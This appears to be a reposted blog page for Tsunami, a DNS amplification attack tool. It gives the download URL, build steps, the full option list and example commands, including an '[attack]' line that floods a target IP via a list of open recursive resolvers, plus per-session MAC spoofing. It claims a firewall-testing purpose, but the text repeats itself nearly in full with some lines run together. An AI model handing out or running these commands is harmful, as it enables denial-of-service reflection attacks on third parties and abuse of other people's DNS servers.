ABOUT
Tsunami is forked from Namescan. It is an open source project by Samiux (GPLv3).
It is designed for research and testing your firewalls as well as IDS/IPS. Do NOT think of using this tool to attack. It is very expensive due to its poor performance. The effect may be differ due to the bandwidth, number of sessions and the size of feedback from the domain query as well as the power of the tool.
All the features of Namescan are included in Tsunami. That means, you can use Tsunami as a scanner too. Please note that Namescan features/functions cannot be used with Tsunami functions.
KNOW ISSUE
The performance of this tool is very very poor.
Tsunami only works on Kali Linux 1.0.9a or above. Other linux distributions may not working properly.
The -p switch, do not set more than 1000 as it will consume a lot of memory.
FEATURE
Tsunami will spoof the MAC address on every session and it will be changed on the next session. There are some useful scripts for your usage. However, you may need to change something to suit your desire.
DOWNLOAD
sha1sum : 3752d96018e2950aec7268fa4977fa5a26ced59d tsunami-0.0.9.tar.gz
sha256sum : ad42e8958a9cfefd99b3e891ba8b584f7bfa30f58860a20876da2f6df604413b tsunami-0.0.9.tar.gz
VERSION
(FEB 3, 2015) v0.0.7
[+] First release and open source under GPLv3
(MAR 8, 2015) v0.0.8
[+] Unlocked some offensive codes and scripts
(JUN 3, 2015) v0.0.9
[+] Fixed speed information
[+] Performance boost
COMPILATION
To compile on Kali Linux 1.0.9a or above :
** To inspect the loading of the network interface card, run "nload"
DNS QUERY TYPE
http://en.wikipedia.org/wiki/List_of_DNS_record_types
http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml
USAGE
Tsunami 0.0.9 - DNS Amplification Attack Tool
Modified by Samiux - http://www.infosec-ninjas.com/tsunami
Usage: ./tsunami [-i <iface>] [-v] [-s <source>] [-n <domain name>]
[-l <amplify level>] [-f <input file>] [-o <output file>]
[-t <timeout>] [-d <delay>] [-q <type>] [-c <class>] [-r]
[-e] [-p <# of packets>] [-m <# of times>] [<address to scan>]
-i : the interface to use. If not specified, the first available
interface will be used.
-v : verbose mode.
-s : the target IP address.
-n : optional domain name to probe. Default is current hostname.
-l : show only recursive that are above this amplification ratio.
-f : the open recursive dns servers file for attack.
-o : print the scanned ip addresses to file.
-d : delay between packets. Default is 0.
-t : timeout after last probe. Default is 3 secs.
-q : query type. Default is 1.
-c : query class. Default is 1.
-r : do not randomize recurvise dns servers list.
-e : do not add EDNS0 record.
-p : number of packets to be send per dns server. Default is 1 packets.
-m : number of times to run. Default is 1.
-h : this screen.
Example : [attack] ./tsunami -s 192.168.20.103 -n google.com -p 1 -f recursive_dns.txt
[scan] ./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
Tsunami is forked from Namescan. It is an open source project by Samiux (GPLv3).
It is designed for research and testing your firewalls as well as IDS/IPS. Do NOT think of using this tool to attack. It is very expensive due to its poor performance. The effect may be differ due to the bandwidth, number of sessions and the size of feedback from the domain query as well as the power of the tool.
All the features of Namescan are included in Tsunami. That means, you can use Tsunami as a scanner too. Please note that Namescan features/functions cannot be used with Tsunami functions.
KNOW ISSUE
The performance of this tool is very very poor.
Tsunami only works on Kali Linux 1.0.9a or above. Other linux distributions may not working properly.
The -p switch, do not set more than 1000 as it will consume a lot of memory.
FEATURE
Tsunami will spoof the MAC address on every session and it will be changed on the next session. There are some useful scripts for your usage. However, you may need to change something to suit your desire.
DOWNLOAD
wget http://www.infosec-ninjas.com/files/tsunami-0.0.9.tar.gzsha1sum : 3752d96018e2950aec7268fa4977fa5a26ced59d tsunami-0.0.9.tar.gz
sha256sum : ad42e8958a9cfefd99b3e891ba8b584f7bfa30f58860a20876da2f6df604413b tsunami-0.0.9.tar.gz
VERSION
(FEB 3, 2015) v0.0.7
[+] First release and open source under GPLv3
(MAR 8, 2015) v0.0.8
[+] Unlocked some offensive codes and scripts
(JUN 3, 2015) v0.0.9
[+] Fixed speed information
[+] Performance boost
COMPILATION
To compile on Kali Linux 1.0.9a or above :
apt-get install dh-autoreconf libpcap-dev nloadautoreconf -i
./configure
make** To inspect the loading of the network interface card, run "nload"
DNS QUERY TYPE
http://en.wikipedia.org/wiki/List_of_DNS_record_types
http://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml
USAGE
Tsunami 0.0.9 - DNS Amplification Attack Tool
Modified by Samiux - http://www.infosec-ninjas.com/tsunami
Usage: ./tsunami [-i <iface>] [-v] [-s <source>] [-n <domain name>]
[-l <amplify level>] [-f <input file>] [-o <output file>]
[-t <timeout>] [-d <delay>] [-q <type>] [-c <class>] [-r]
[-e] [-p <# of packets>] [-m <# of times>] [<address to scan>]
-i : the interface to use. If not specified, the first available
interface will be used.
-v : verbose mode.
-s : the target IP address.
-n : optional domain name to probe. Default is current hostname.
-l : show only recursive that are above this amplification ratio.
-f : the open recursive dns servers file for attack.
-o : print the scanned ip addresses to file.
-d : delay between packets. Default is 0.
-t : timeout after last probe. Default is 3 secs.
-q : query type. Default is 1.
-c : query class. Default is 1.
-r : do not randomize recurvise dns servers list.
-e : do not add EDNS0 record.
-p : number of packets to be send per dns server. Default is 1 packets.
-m : number of times to run. Default is 1.
-h : this screen.
Example : [attack] ./tsunami -s 192.168.20.103 -n google.com -p 1 -f recursive_dns.txt
[scan] ./tsunami -o recursive_dns.txt -l 4 -e 172.0.0.0/8
Comentários
Postar um comentário